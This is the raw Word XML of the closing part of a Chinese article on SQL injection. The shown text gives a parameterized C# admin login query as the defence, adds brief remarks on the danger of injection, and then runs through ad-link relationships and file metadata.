            <w:proofErr w:type="spellEnd"/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&lt;summary&gt;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/// Admin 登录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&lt;/summary&gt;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name="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"&gt;登录目标对象&lt;/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param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/// &lt;returns&gt;返回操作结果，true成功 / false失败&lt;/returns&gt;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public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bool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Login(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count = 0;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string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" select count(1) from Admin where Username=@Username and Password=@Password ";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using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SqlConnection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SqlConnection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DBHelper.CONNECTIONSTRING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conn.Open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using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SqlCommand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comm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SqlCommand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conn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))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{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comm.Parameters.AddRange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(new[] {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SqlParameter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("@Username",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adminInfo.Username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), new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SqlParameter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 xml:space="preserve">("@Password", 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adminInfo.Password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 });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    count = (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int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)</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008554ED">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>comm.ExecuteScalar</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008554E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    return</w:t>
            </w:r>
            <w:r w:rsidRPr="008554E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554ED">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>count &gt; 0;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    }</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008554ED" w:rsidRPr="008554ED" w:rsidRDefault="008554ED" w:rsidP="008554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54ED">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t> }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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当然，数据库的存储过程也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不是没卵用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的咸鱼，记得多用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008554ED" w:rsidRPr="008554ED" w:rsidRDefault="008554ED" w:rsidP="008554ED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五、 没了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就是演示一下危害，什么年代了都，不应该出现注入的问题了吧。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毕竟每个项目不一样，指不定注入还会导致什么问题呢。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008554ED" w:rsidRPr="008554ED" w:rsidRDefault="008554ED" w:rsidP="008554ED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最后。。。。。。。。。。。大牛勿喷。么</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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么</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008554ED">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>哒~</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00545D79" w:rsidRDefault="00545D79"/>
    <w:sectPr w:rsidR="00545D79" w:rsidSect="008554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4ED"/>
    <w:rsid w:val="00545D79"/>
    <w:rsid w:val="0085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54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54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54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54E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554ED"/>
  </w:style>
  <w:style w:type="character" w:styleId="a3">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008554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54E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55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54E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54E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5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9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1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7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0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5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6554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544842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54718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361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03830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05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203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6067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459096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99572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4222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621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7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44200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81459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1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703163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15228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2cto.com/Article/201511/448553.html" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.2cto.com/Article/201511/448553.html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s://cpro.baidu.com/cpro/ui/uijs.php?adclass=0&amp;app_id=0&amp;c=news&amp;cf=1&amp;ch=0&amp;di=8&amp;fv=9&amp;is_app=0&amp;jk=b9682ad1fc41e458&amp;k=ddos%B7%C0%D3%F9&amp;k0=ddos%B7%C0%D3%F9&amp;k1=%B6%CC%D0%C5%D1%E9%D6%A4%C2%EB%BD%D3%BF%DA&amp;k2=oa%B0%EC%B9%AB%CF%B5%CD%B3&amp;k3=app%BF%AA%B7%A2%B1%A8%BC%DB%B5%A5&amp;k4=%CE%C4%B5%B5%B9%DC%C0%ED%CF%B5%CD%B3&amp;k5=ddos%B7%C0%BB%F0%C7%BD&amp;kdi0=8&amp;kdi1=8&amp;kdi2=8&amp;kdi3=8&amp;kdi4=8&amp;kdi5=8&amp;luki=1&amp;mcpm=118897&amp;n=10&amp;p=baidu&amp;q=77zb_cpr&amp;rb=1&amp;rs=1&amp;seller_id=5&amp;sid=58e441fcd12a68b9&amp;ssp2=1&amp;stid=22&amp;t=tpclicked3_hc&amp;td=&amp;tu=u2597675&amp;u=http%3A%2F%2Fwww%2E2cto%2Ecom%2FArticle%2F201511%2F448553%2Ehtml&amp;urli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pro.baidu.com/cpro/ui/uijs.php?adclass=0&amp;app_id=0&amp;c=news&amp;cf=5&amp;ch=0&amp;di=8&amp;fv=9&amp;is_app=0&amp;jk=c9ff355f577fa80b&amp;k=ddos%B7%C0%D3%F9&amp;k0=ddos%B7%C0%D3%F9&amp;k1=%B6%CC%D0%C5%D1%E9%D6%A4%C2%EB%BD%D3%BF%DA&amp;k2=oa%B0%EC%B9%AB%CF%B5%CD%B3&amp;k3=app%BF%AA%B7%A2%B1%A8%BC%DB%B5%A5&amp;k4=%CE%C4%B5%B5%B9%DC%C0%ED%CF%B5%CD%B3&amp;k5=ddos%B7%C0%BB%F0%C7%BD&amp;kdi0=8&amp;kdi1=8&amp;kdi2=8&amp;kdi3=8&amp;kdi4=8&amp;kdi5=8&amp;luki=1&amp;mcpm=100588&amp;n=10&amp;p=baidu&amp;q=77zb_cpr&amp;rb=1&amp;rs=1&amp;seller_id=5&amp;sid=ba87f575f35ffc9&amp;ssp2=1&amp;stid=22&amp;t=tpclicked3_hc&amp;td=&amp;tu=u2597675&amp;u=http%3A%2F%2Fwww%2E2cto%2Ecom%2FArticle%2F201511%2F448553%2Ehtml&amp;urlid=0" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cpro.baidu.com/cpro/ui/uijs.php?adclass=0&amp;app_id=0&amp;c=news&amp;cf=5&amp;ch=0&amp;di=8&amp;fv=9&amp;is_app=0&amp;jk=b56b09ed1ae3ce47&amp;k=%B6%CC%D0%C5%D1%E9%D6%A4%C2%EB%BD%D3%BF%DA&amp;k0=%B6%CC%D0%C5%D1%E9%D6%A4%C2%EB%BD%D3%BF%DA&amp;k1=%CE%C4%B5%B5%B9%DC%C0%ED%CF%B5%CD%B3&amp;k2=oa%B0%EC%B9%AB%CF%B5%CD%B3&amp;k3=ddos%B7%C0%BB%F0%C7%BD&amp;k4=app%BF%AA%B7%A2%B1%A8%BC%DB%B5%A5&amp;k5=ddos%B7%C0%D3%F9&amp;kdi0=8&amp;kdi1=8&amp;kdi2=8&amp;kdi3=8&amp;kdi4=8&amp;kdi5=8&amp;luki=3&amp;mcpm=118179&amp;n=10&amp;p=baidu&amp;q=77zb_cpr&amp;rb=1&amp;rs=1&amp;seller_id=5&amp;sid=47cee31aed096bb5&amp;ssp2=1&amp;stid=22&amp;t=tpclicked3_hc&amp;td=&amp;tu=u2597675&amp;u=http%3A%2F%2Fwww%2E2cto%2Ecom%2FArticle%2F201511%2F448553%2Ehtml&amp;urlid=0" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cpro.baidu.com/cpro/ui/uijs.php?adclass=0&amp;app_id=0&amp;c=news&amp;cf=1&amp;ch=0&amp;di=8&amp;fv=9&amp;is_app=0&amp;jk=b9682ad1fc41e458&amp;k=oa%B0%EC%B9%AB%CF%B5%CD%B3&amp;k0=oa%B0%EC%B9%AB%CF%B5%CD%B3&amp;k1=app%BF%AA%B7%A2%B1%A8%BC%DB%B5%A5&amp;k2=%CE%C4%B5%B5%B9%DC%C0%ED%CF%B5%CD%B3&amp;k3=ddos%B7%C0%BB%F0%C7%BD&amp;k4=ddos%B7%C0%D3%F9&amp;k5=%B6%CC%D0%C5%D1%E9%D6%A4%C2%EB%BD%D3%BF%DA&amp;kdi0=8&amp;kdi1=8&amp;kdi2=8&amp;kdi3=8&amp;kdi4=8&amp;kdi5=8&amp;luki=4&amp;mcpm=124435&amp;n=10&amp;p=baidu&amp;q=77zb_cpr&amp;rb=1&amp;rs=1&amp;seller_id=5&amp;sid=58e441fcd12a68b9&amp;ssp2=1&amp;stid=22&amp;t=tpclicked3_hc&amp;td=&amp;tu=u2597675&amp;u=http%3A%2F%2Fwww%2E2cto%2Ecom%2FArticle%2F201511%2F448553%2Ehtml&amp;urlid=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2cto.com/index.php?m=member&amp;c=content&amp;a=publish&amp;modid=1&amp;siteid=1" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.2cto.com/Article/201511/448553.html" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.2cto.com/Article/201511/448553.html" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cpro.baidu.com/cpro/ui/uijs.php?adclass=0&amp;app_id=0&amp;c=news&amp;cf=5&amp;ch=0&amp;di=8&amp;fv=9&amp;is_app=0&amp;jk=c9ff355f577fa80b&amp;k=oa%B0%EC%B9%AB%CF%B5%CD%B3&amp;k0=oa%B0%EC%B9%AB%CF%B5%CD%B3&amp;k1=app%BF%AA%B7%A2%B1%A8%BC%DB%B5%A5&amp;k2=%CE%C4%B5%B5%B9%DC%C0%ED%CF%B5%CD%B3&amp;k3=ddos%B7%C0%BB%F0%C7%BD&amp;k4=ddos%B7%C0%D3%F9&amp;k5=%B6%CC%D0%C5%D1%E9%D6%A4%C2%EB%BD%D3%BF%DA&amp;kdi0=8&amp;kdi1=8&amp;kdi2=8&amp;kdi3=8&amp;kdi4=8&amp;kdi5=8&amp;luki=3&amp;mcpm=105272&amp;n=10&amp;p=baidu&amp;q=77zb_cpr&amp;rb=1&amp;rs=1&amp;seller_id=5&amp;sid=ba87f575f35ffc9&amp;ssp2=1&amp;stid=22&amp;t=tpclicked3_hc&amp;td=&amp;tu=u2597675&amp;u=http%3A%2F%2Fwww%2E2cto%2Ecom%2FArticle%2F201511%2F448553%2Ehtml&amp;urlid=0" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cpro.baidu.com/cpro/ui/uijs.php?adclass=0&amp;app_id=0&amp;c=news&amp;cf=5&amp;ch=0&amp;di=1&amp;fv=9&amp;is_app=0&amp;jk=b56b09ed1ae3ce47&amp;k=%C2%B7%D3%C9%C6%F7%C9%E8%D6%C3%C3%DC%C2%EB&amp;k0=%C2%B7%D3%C9%C6%F7%C9%E8%D6%C3%C3%DC%C2%EB&amp;k1=%B6%CC%D0%C5%D1%E9%D6%A4%C2%EB%BD%D3%BF%DA&amp;k2=%CE%C4%B5%B5%B9%DC%C0%ED%CF%B5%CD%B3&amp;k3=oa%B0%EC%B9%AB%CF%B5%CD%B3&amp;k4=ddos%B7%C0%BB%F0%C7%BD&amp;k5=app%BF%AA%B7%A2%B1%A8%BC%DB%B5%A5&amp;kdi0=1&amp;kdi1=8&amp;kdi2=8&amp;kdi3=8&amp;kdi4=8&amp;kdi5=8&amp;luki=2&amp;mcpm=9767&amp;n=10&amp;p=baidu&amp;q=77zb_cpr&amp;rb=1&amp;rs=1&amp;seller_id=5&amp;sid=47cee31aed096bb5&amp;ssp2=1&amp;stid=22&amp;t=tpclicked3_hc&amp;td=&amp;tu=u2597675&amp;u=http%3A%2F%2Fwww%2E2cto%2Ecom%2FArticle%2F201511%2F448553%2Ehtml&amp;urlid=0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2cto.com/Article/201511/448553.html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cpro.baidu.com/cpro/ui/uijs.php?adclass=0&amp;app_id=0&amp;c=news&amp;cf=5&amp;ch=0&amp;di=8&amp;fv=9&amp;is_app=0&amp;jk=c9ff355f577fa80b&amp;k=app%BF%AA%B7%A2%B1%A8%BC%DB%B5%A5&amp;k0=app%BF%AA%B7%A2%B1%A8%BC%DB%B5%A5&amp;k1=%CE%C4%B5%B5%B9%DC%C0%ED%CF%B5%CD%B3&amp;k2=ddos%B7%C0%BB%F0%C7%BD&amp;k3=ddos%B7%C0%D3%F9&amp;k4=%B6%CC%D0%C5%D1%E9%D6%A4%C2%EB%BD%D3%BF%DA&amp;k5=oa%B0%EC%B9%AB%CF%B5%CD%B3&amp;kdi0=8&amp;kdi1=8&amp;kdi2=8&amp;kdi3=8&amp;kdi4=8&amp;kdi5=8&amp;luki=5&amp;mcpm=87434&amp;n=10&amp;p=baidu&amp;q=77zb_cpr&amp;rb=1&amp;rs=1&amp;seller_id=5&amp;sid=ba87f575f35ffc9&amp;ssp2=1&amp;stid=22&amp;t=tpclicked3_hc&amp;td=&amp;tu=u2597675&amp;u=http%3A%2F%2Fwww%2E2cto%2Ecom%2FArticle%2F201511%2F448553%2Ehtml&amp;urlid=0" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cpro.baidu.com/cpro/ui/uijs.php?adclass=0&amp;app_id=0&amp;c=news&amp;cf=1&amp;ch=0&amp;di=1&amp;fv=9&amp;is_app=0&amp;jk=b9682ad1fc41e458&amp;k=%C2%B7%D3%C9%C6%F7%C9%E8%D6%C3%C3%DC%C2%EB&amp;k0=%C2%B7%D3%C9%C6%F7%C9%E8%D6%C3%C3%DC%C2%EB&amp;k1=oa%B0%EC%B9%AB%CF%B5%CD%B3&amp;k2=app%BF%AA%B7%A2%B1%A8%BC%DB%B5%A5&amp;k3=%CE%C4%B5%B5%B9%DC%C0%ED%CF%B5%CD%B3&amp;k4=ddos%B7%C0%BB%F0%C7%BD&amp;k5=ddos%B7%C0%D3%F9&amp;kdi0=1&amp;kdi1=8&amp;kdi2=8&amp;kdi3=8&amp;kdi4=8&amp;kdi5=8&amp;luki=3&amp;mcpm=9750&amp;n=10&amp;p=baidu&amp;q=77zb_cpr&amp;rb=1&amp;rs=1&amp;seller_id=5&amp;sid=58e441fcd12a68b9&amp;ssp2=1&amp;stid=22&amp;t=tpclicked3_hc&amp;td=&amp;tu=u2597675&amp;u=http%3A%2F%2Fwww%2E2cto%2Ecom%2FArticle%2F201511%2F448553%2Ehtml&amp;urlid=0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6.jpeg"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cpro.baidu.com/cpro/ui/uijs.php?adclass=0&amp;app_id=0&amp;c=news&amp;cf=5&amp;ch=0&amp;di=8&amp;fv=9&amp;is_app=0&amp;jk=b56b09ed1ae3ce47&amp;k=ddos%B7%C0%D3%F9&amp;k0=ddos%B7%C0%D3%F9&amp;k1=%B6%CC%D0%C5%D1%E9%D6%A4%C2%EB%BD%D3%BF%DA&amp;k2=%CE%C4%B5%B5%B9%DC%C0%ED%CF%B5%CD%B3&amp;k3=oa%B0%EC%B9%AB%CF%B5%CD%B3&amp;k4=ddos%B7%C0%BB%F0%C7%BD&amp;k5=app%BF%AA%B7%A2%B1%A8%BC%DB%B5%A5&amp;kdi0=8&amp;kdi1=8&amp;kdi2=8&amp;kdi3=8&amp;kdi4=8&amp;kdi5=8&amp;luki=1&amp;mcpm=110369&amp;n=10&amp;p=baidu&amp;q=77zb_cpr&amp;rb=1&amp;rs=1&amp;seller_id=5&amp;sid=47cee31aed096bb5&amp;ssp2=1&amp;stid=22&amp;t=tpclicked3_hc&amp;td=&amp;tu=u2597675&amp;u=http%3A%2F%2Fwww%2E2cto%2Ecom%2FArticle%2F201511%2F448553%2Ehtml&amp;urlid=0" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cpro.baidu.com/cpro/ui/uijs.php?adclass=0&amp;app_id=0&amp;c=news&amp;cf=5&amp;ch=0&amp;di=8&amp;fv=9&amp;is_app=0&amp;jk=b56b09ed1ae3ce47&amp;k=oa%B0%EC%B9%AB%CF%B5%CD%B3&amp;k0=oa%B0%EC%B9%AB%CF%B5%CD%B3&amp;k1=ddos%B7%C0%BB%F0%C7%BD&amp;k2=app%BF%AA%B7%A2%B1%A8%BC%DB%B5%A5&amp;k3=ddos%B7%C0%D3%F9&amp;k4=%B6%CC%D0%C5%D1%E9%D6%A4%C2%EB%BD%D3%BF%DA&amp;k5=%CE%C4%B5%B5%B9%DC%C0%ED%CF%B5%CD%B3&amp;kdi0=8&amp;kdi1=8&amp;kdi2=8&amp;kdi3=8&amp;kdi4=8&amp;kdi5=8&amp;luki=5&amp;mcpm=109571&amp;n=10&amp;p=baidu&amp;q=77zb_cpr&amp;rb=1&amp;rs=1&amp;seller_id=5&amp;sid=47cee31aed096bb5&amp;ssp2=1&amp;stid=22&amp;t=tpclicked3_hc&amp;td=&amp;tu=u2597675&amp;u=http%3A%2F%2Fwww%2E2cto%2Ecom%2FArticle%2F201511%2F448553%2Ehtml&amp;urlid=0" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cpro.baidu.com/cpro/ui/uijs.php?adclass=0&amp;app_id=0&amp;c=news&amp;cf=1&amp;ch=0&amp;di=8&amp;fv=9&amp;is_app=0&amp;jk=b9682ad1fc41e458&amp;k=%B6%CC%D0%C5%D1%E9%D6%A4%C2%EB%BD%D3%BF%DA&amp;k0=%B6%CC%D0%C5%D1%E9%D6%A4%C2%EB%BD%D3%BF%DA&amp;k1=oa%B0%EC%B9%AB%CF%B5%CD%B3&amp;k2=app%BF%AA%B7%A2%B1%A8%BC%DB%B5%A5&amp;k3=%CE%C4%B5%B5%B9%DC%C0%ED%CF%B5%CD%B3&amp;k4=ddos%B7%C0%BB%F0%C7%BD&amp;k5=ddos%B7%C0%D3%F9&amp;kdi0=8&amp;kdi1=8&amp;kdi2=8&amp;kdi3=8&amp;kdi4=8&amp;kdi5=8&amp;luki=2&amp;mcpm=137564&amp;n=10&amp;p=baidu&amp;q=77zb_cpr&amp;rb=1&amp;rs=1&amp;seller_id=5&amp;sid=58e441fcd12a68b9&amp;ssp2=1&amp;stid=22&amp;t=tpclicked3_hc&amp;td=&amp;tu=u2597675&amp;u=http%3A%2F%2Fwww%2E2cto%2Ecom%2FArticle%2F201511%2F448553%2Ehtml&amp;urlid=0" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.2cto.com/Article/201511/448553.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.2cto.com/Article/201511/448553.html" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.2cto.com/Article/201511/448553.html" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cpro.baidu.com/cpro/ui/uijs.php?adclass=0&amp;app_id=0&amp;c=news&amp;cf=5&amp;ch=0&amp;di=8&amp;fv=9&amp;is_app=0&amp;jk=c9ff355f577fa80b&amp;k=%B6%CC%D0%C5%D1%E9%D6%A4%C2%EB%BD%D3%BF%DA&amp;k0=%B6%CC%D0%C5%D1%E9%D6%A4%C2%EB%BD%D3%BF%DA&amp;k1=oa%B0%EC%B9%AB%CF%B5%CD%B3&amp;k2=app%BF%AA%B7%A2%B1%A8%BC%DB%B5%A5&amp;k3=%CE%C4%B5%B5%B9%DC%C0%ED%CF%B5%CD%B3&amp;k4=ddos%B7%C0%BB%F0%C7%BD&amp;k5=ddos%B7%C0%D3%F9&amp;kdi0=8&amp;kdi1=8&amp;kdi2=8&amp;kdi3=8&amp;kdi4=8&amp;kdi5=8&amp;luki=2&amp;mcpm=116380&amp;n=10&amp;p=baidu&amp;q=77zb_cpr&amp;rb=1&amp;rs=1&amp;seller_id=5&amp;sid=ba87f575f35ffc9&amp;ssp2=1&amp;stid=22&amp;t=tpclicked3_hc&amp;td=&amp;tu=u2597675&amp;u=http%3A%2F%2Fwww%2E2cto%2Ecom%2FArticle%2F201511%2F448553%2Ehtml&amp;urlid=0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1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.2cto.com/Article/201511/448553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3.png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http://www.2cto.com/Article/201511/448553.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.2cto.com/Article/201511/448553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cpro.baidu.com/cpro/ui/uijs.php?adclass=0&amp;app_id=0&amp;c=news&amp;cf=5&amp;ch=0&amp;di=1&amp;fv=9&amp;is_app=0&amp;jk=c9ff355f577fa80b&amp;k=%C2%B7%D3%C9%C6%F7%C9%E8%D6%C3%C3%DC%C2%EB&amp;k0=%C2%B7%D3%C9%C6%F7%C9%E8%D6%C3%C3%DC%C2%EB&amp;k1=app%BF%AA%B7%A2%B1%A8%BC%DB%B5%A5&amp;k2=%CE%C4%B5%B5%B9%DC%C0%ED%CF%B5%CD%B3&amp;k3=ddos%B7%C0%BB%F0%C7%BD&amp;k4=ddos%B7%C0%D3%F9&amp;k5=%B6%CC%D0%C5%D1%E9%D6%A4%C2%EB%BD%D3%BF%DA&amp;kdi0=1&amp;kdi1=8&amp;kdi2=8&amp;kdi3=8&amp;kdi4=8&amp;kdi5=8&amp;luki=4&amp;mcpm=9748&amp;n=10&amp;p=baidu&amp;q=77zb_cpr&amp;rb=1&amp;rs=1&amp;seller_id=5&amp;sid=ba87f575f35ffc9&amp;ssp2=1&amp;stid=22&amp;t=tpclicked3_hc&amp;td=&amp;tu=u2597675&amp;u=http%3A%2F%2Fwww%2E2cto%2Ecom%2FArticle%2F201511%2F448553%2Ehtml&amp;urlid=0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s://cpro.baidu.com/cpro/ui/uijs.php?adclass=0&amp;app_id=0&amp;c=news&amp;cf=5&amp;ch=0&amp;di=8&amp;fv=9&amp;is_app=0&amp;jk=b56b09ed1ae3ce47&amp;k=%CE%C4%B5%B5%B9%DC%C0%ED%CF%B5%CD%B3&amp;k0=%CE%C4%B5%B5%B9%DC%C0%ED%CF%B5%CD%B3&amp;k1=oa%B0%EC%B9%AB%CF%B5%CD%B3&amp;k2=ddos%B7%C0%BB%F0%C7%BD&amp;k3=app%BF%AA%B7%A2%B1%A8%BC%DB%B5%A5&amp;k4=ddos%B7%C0%D3%F9&amp;k5=%B6%CC%D0%C5%D1%E9%D6%A4%C2%EB%BD%D3%BF%DA&amp;kdi0=8&amp;kdi1=8&amp;kdi2=8&amp;kdi3=8&amp;kdi4=8&amp;kdi5=8&amp;luki=4&amp;mcpm=63697&amp;n=10&amp;p=baidu&amp;q=77zb_cpr&amp;rb=1&amp;rs=1&amp;seller_id=5&amp;sid=47cee31aed096bb5&amp;ssp2=1&amp;stid=22&amp;t=tpclicked3_hc&amp;td=&amp;tu=u2597675&amp;u=http%3A%2F%2Fwww%2E2cto%2Ecom%2FArticle%2F201511%2F448553%2Ehtml&amp;urlid=0" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cpro.baidu.com/cpro/ui/uijs.php?adclass=0&amp;app_id=0&amp;c=news&amp;cf=1&amp;ch=0&amp;di=8&amp;fv=9&amp;is_app=0&amp;jk=b9682ad1fc41e458&amp;k=app%BF%AA%B7%A2%B1%A8%BC%DB%B5%A5&amp;k0=app%BF%AA%B7%A2%B1%A8%BC%DB%B5%A5&amp;k1=%CE%C4%B5%B5%B9%DC%C0%ED%CF%B5%CD%B3&amp;k2=ddos%B7%C0%BB%F0%C7%BD&amp;k3=ddos%B7%C0%D3%F9&amp;k4=%B6%CC%D0%C5%D1%E9%D6%A4%C2%EB%BD%D3%BF%DA&amp;k5=oa%B0%EC%B9%AB%CF%B5%CD%B3&amp;kdi0=8&amp;kdi1=8&amp;kdi2=8&amp;kdi3=8&amp;kdi4=8&amp;kdi5=8&amp;luki=5&amp;mcpm=103349&amp;n=10&amp;p=baidu&amp;q=77zb_cpr&amp;rb=1&amp;rs=1&amp;seller_id=5&amp;sid=58e441fcd12a68b9&amp;ssp2=1&amp;stid=22&amp;t=tpclicked3_hc&amp;td=&amp;tu=u2597675&amp;u=http%3A%2F%2Fwww%2E2cto%2Ecom%2FArticle%2F201511%2F448553%2Ehtml&amp;url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3057</Words>
  <Characters>17431</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>145</Lines>
  <Paragraphs>40</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>20448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2016-07-17T03:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-07-17T07:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>